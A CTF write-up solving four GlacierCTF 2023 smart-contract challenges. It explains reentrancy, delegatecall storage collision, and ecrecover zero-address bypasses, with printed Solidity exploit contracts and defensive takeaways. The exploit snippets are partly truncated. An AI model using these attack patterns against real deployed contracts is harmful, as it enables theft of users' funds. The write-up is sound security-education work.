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GlacierCTF 2023 Writeups - Smart Contracts Category

GlcierCTF - SmartContracts category solutions ⛳️

I have participated in the GlacierCTF2k23 with the team th3_Shell7evens and we have managed to solve all the category challenges. This repository contains challenges writeups

Useful commands

forge compile ## Compile smart contracts
forge test ## Run tests for challenges solution
forge test -vvv ## Run tests for challenges with tracers enabled

Repository Structure

src: Challenges contracts code
test: Challenges solves tests
scripts: Challenges solves scripts


01 - GlacierCoin

Vulnerability presented in the challenge: Reentrancy

Attack workflow

By inspecting the isSolved method, we need to steal all the target's balance:

function isSolved() public view returns (bool) {
    return address(TARGET).balance == 0;

The GlacierCoin is a simplified Token contract. We need to steal the contract's balance, so we need to search for a method that transfers ether externally. After a quick inspect, the function we are interested in is sell

function sell(uint256 amount) public
    require(balances[msg.sender] >= amount, "You can not sell this much as you are poor af");
    uint256 new_balance = balances[msg.sender] - amount;
    (msg.sender).call{value: amount}("");
    balances[msg.sender] = new_balance;

If we notice, the contract attempts to send ether to the seller first, then it updates the balances state by decreasing the seller's balance. We know that when a contract receives ether, its receive() fallback is invoked. So, we can create a contract that when it receives ether, in other words: when its receive() fallback is invoked, it calls back the GlacierCoin contract to sell more tokens. That is possible because:

  1. GlacierCoin contract is updating the seller's balance only after sending ether to it.
  2. Smart contracts execution is sequential (the fallback executions will be executed before the state update).

Of course, we initialize the attack by buying 1 ether equivalent of tokens.

If you are not familiar with the Reentrancy attack, I've explained it in details here

Attack summary

  1. Create a contract and initialize it with the Target contract.
  2. Call buy method and send 1 ether along.
  3. Call sell(1 ether) method.
  4. When the GlacierCoin attempts to send ether to the Hack contract, the receive() fallback will call again the sell method (this process will repeat as long as ClacierCoin's balance is greater than zero).

Hack Contract

contract Hack {
    GlacierCoin target;
    constructor(GlacierCoin _target) {
        target = _target;

    function hack() external payable {
        require(msg.value == 1 ether, "Provide 1 ether to start the exploit");{value: msg.value}();

     receive() external payable {
        if (address(target).balance > 0) {


What to take from this challenge: Respect Checks Effects Interactions pattern. Update the internal state before making external calls, or apply mutual execution to functions that make external calls (can be implemented using OpenZeppelin's ReentrancyGuard contract).

Hack Contract | Solve test | Solve script

02 - GlacierVault

To solve this challenge, we need to update the state of asleep to be true.

function isSolved() public view returns (bool) {
    return TARGET.asleep();

Vulnerability presented in the challenge: Dangerous use of delegatecall

Attack workflow

We need to update the asleep to true stored in the Guardian contract. There are two functions that do so, punch (which is not applicable as it requires 10M ether which we don't have) and putToSleep:

function putToSleep() external {
    emit putToSleepCall(msg.sender, owner);
    require(msg.sender == owner, "You can't do that. The yeti mauls you.");
    asleep = true;

We notice that we must be the owner to make the call. So, the whole challenge is about stealing the ownership of Guardian contract. There's no way to update the owner state on the contract. However, the contract includes fallback() method which we know that it will be executed if we attempt to call a function that does not exist. The fallback() invokes the _delegate function which includes some interesting assembly code:

function _delegate(address implementation) internal {
    assembly {
        // Copy We take full control of memory in this inline assembly
        // block because it will not return to Solidity code. We overwrite the
        // Solidity scratch pad at memory position 0.
        calldatacopy(0, 0, calldatasize())

        // Call the implementation.
        // out and outsize are 0 because we don't know the size yet.
        let result := delegatecall(gas(), implementation, 0, calldatasize(), 0, 0)

        // Copy the returned data.
        returndatacopy(0, 0, returndatasize())

        switch result
        // delegatecall returns 0 on error.
        case 0 {
        revert(0, returndatasize())
        default {
            return(0, returndatasize())

We're not going to explain each instruction as the code already has some useful comments. We're interested in this line:

let result := delegatecall(gas(), implementation, 0, calldatasize(), 0, 0)

We're making a delegatecall to the implementation contract which got initialized to GlacierVault in the constructor. From the previous two instructions, we can see that whatever contains, it will be delegated to the implementation. One thing you MUST keep in mind when working with delegatecall: it preserves the context. Meaning that the delegated contract(GlacierVault) will execute in the context of Guardian. So, in the GlacierVault:

  1. writing to storage will affect the Guardian storage, not its storage.
  2. The values of msg.value, msg.sender will be in the context of Guardian. The first point is interesting (writing to storage will affect the Guardian storage, not its storage).

If you don't know how smart contract stores its variable, or you are not familiar with the term slot, I invite you to read this article

The owner state is stored in slot 2. So, if the Guardian contract delegates the call to GlacierVault and the last writes to slot2, the owner state will be updated!
After inspecting the GlacierVault, quickStore will write to storage 2 whatever value we specify as argument if the index argument is 0 (because in such situation, the quickstore1 will be updated, and it is stored in slot 2):

function quickStore(uint8 index, uint256 value) public payable {
    require(msg.value == 1337);
    if(index == 0) {
        quickstore1 = value;

That's it! Let's make a recap of the attack flow:

  1. Deploy a Hack contract and initialize it with the target
  2. Calculate the function signature of quickStore1 passing 0, uint256(uint160(msg.sender)) as arguments. (The cast of the address to uint256 is needed because the function expects uint256 as second argument)
  3. Call the Guardian contract with the calculated and send1337 wei along.
  4. The Guardian contract delegates the execution to GlacierVault via delegatecall
  5. The GlacierVault updates the quickstore1, so the slot2 will contain the value we sent, but this happens in the context of Guardian, so slot2 of Guardian is the one that gets updated. We've got the owner
  6. Call the putToSleep method on Guardian
Hack Contract
contract Hack {
    Guardian target;

    constructor(Guardian _target){
        target = _target;

    function hack() external payable {
        require(msg.value == 1337, "You need to provide 1337 wei to start the exploit");
        bytes memory sig = abi.encodeWithSignature("quickStore(uint8,uint256)",0,uint256(uint160(address(this))));
        (bool success, ) = address(target).call{value: 1337}(sig);


What to take from this challenge: Always remember when working with delegatecall, it preserves the context Hack contract | Solve test | Solve script

03 - ChairLift

Personal pov: This is the most challenge I liked, its idea is nice (because I'm fun of ECC cryptography :V)

Vulnerability presented in the challenge: dangerous use of ecrecover

The Target contract starts with 1 trip taken. We need to take another trip to solve the challenge:

function isSolved() public view returns (bool) {
    return TARGET.tripsTaken() == 2;

To take a ride, we need to have a ticket

function takeRide(uint256 ticketId) external {
    require (ticket.ownerOf(ticketId) == msg.sender, "You don't own this ticket");

    tripsTaken += 1;

So, the whole challenge is about to get at least one ticket. If we want to play honestly and go with the classical approach, we would call the buyTicket function on ChairLift contract, but we must either be an owner or pay 1M ether. We need to find another way :).
There's nothing interesting in ChainLift, so the exploit must be in Ticket contract, the one that manages the tickets as tokens. The contract looks like ERC20 token with slight modifications and implements EIP712

The understanding of EIP712 is not necessary to solve the challenge, but having knowledge about it will help you to get into the security issue quickly.

After spending some time reading the contract and testing possible attack approaches, two functions were suspicious too much. First is _tranfser:

function _transfer(address from, address to, uint256 tokenId) internal {
    require(ownerOf(tokenId) == from, "Ticket: transfer of token that is not own");
    require(to != address(0), "Ticket: transfer to the zero address");

    _owners[tokenId] = to;

    emit Transfer(from, to, tokenId);

The internal function _transfer doesn't make a check that from != address(0) which might be okay, because how can possibly the address zero be the sender? However, remains sus. The second function is transferWithPermit:

function transferWithPermit(address from, address to, uint256 tokenId, uint256 deadline, uint8 v, bytes32 r, bytes32 s) public {
    require(block.timestamp <= deadline, "Ticket: permit expired");
    bytes32 digest = keccak256(abi.encodePacked("\x19\x01", _getDomainSeparator(), keccak256(abi.encode(PERMIT_TYPEHASH, from, to, tokenId, nonces[from]++, deadline))));
    address signer = ecrecover(digest, v, r, s);
    require(signer == from, "Ticket: invalid permit");
    _transfer(from, to, tokenId);

The function contributes to the implementation of EIP712, it provides a way to transfer tokens from one account to another by manually signing a signature by using ecrecover which is an inbuilt cryptographic method that enables the retrieval of the signer's address of a message that has been signed using their private key. The ecrcover takes 4 parameters:

  • bytes32 - The hash of the signed message.
  • uint8 - The v value of the signature, where v the value represents the recovery identifier.
  • bytes32`` - The r` value of the signature.
  • bytes32 - The s value of the signature.

Not familiar with digital signatures? r, s, v seems confusing? Highly suggest reading this

After some research, I found that in case of an invalid signature, it does not revert or return a false boolean, but it returns the address zero.
So, if we call the function passing from as address(0) and whatever other information, this check require(signer == from, "Ticket: invalid permit"); will pass and the _transfer function will be called passing the following arguments: _transfer(address(zero), to, tokenId). Do you remember? The _transfer doesn't check that from != address(0).

Attack workflow

  1. Call the transferWithPermit passing address(0) as from argument, our address as to argument, and 1 as tokenId: transferWithPermit(address(0), OUR_ADDRESS,1,block.timestamp,3,bytes32(uint(3233)), bytes32(uint(555)))
  2. The transferWithPermit will call the internal function _transfer passing the following arguments: _transfer(address(0), OUR_ADDRESS, 1)
  3. The check of require(ownerOf(tokenId) == from, "Ticket: transfer of token that is not own") will pass because no one owns the tokenId 1
  4. The token gets assigned to us via the following instruction: _owners[tokenId] = to. We got the ticket! After that, we call takeRide passing the tokenId we stole.

Hack contract

contract Hack {
    ChairLift target;
    constructor(ChairLift _target) {
        target = _target;

    function hack() external {
        Ticket tr = target.ticket();
        tr.transferWithPermit(address(0), address(this),1,block.timestamp,3,bytes32(uint(3233)), bytes32(uint(555)));

What to take from the challenge: ecrecover returns address(0) if the signature is invalid. Always check the values of from and to Hack Contract | Solve test | Solve script

04 - Council Of Apes

Vulnerability presented in the challenge: Flash Loan attack

To solve the challenge, we need to understand the codebase and build a logical flow of transactions. Getting familiar with Flash Loan Attacks will help solving the challenge quickly. The attack workflow can be understood on the Hack contract directly. Hack contract | Solve test | Solve script


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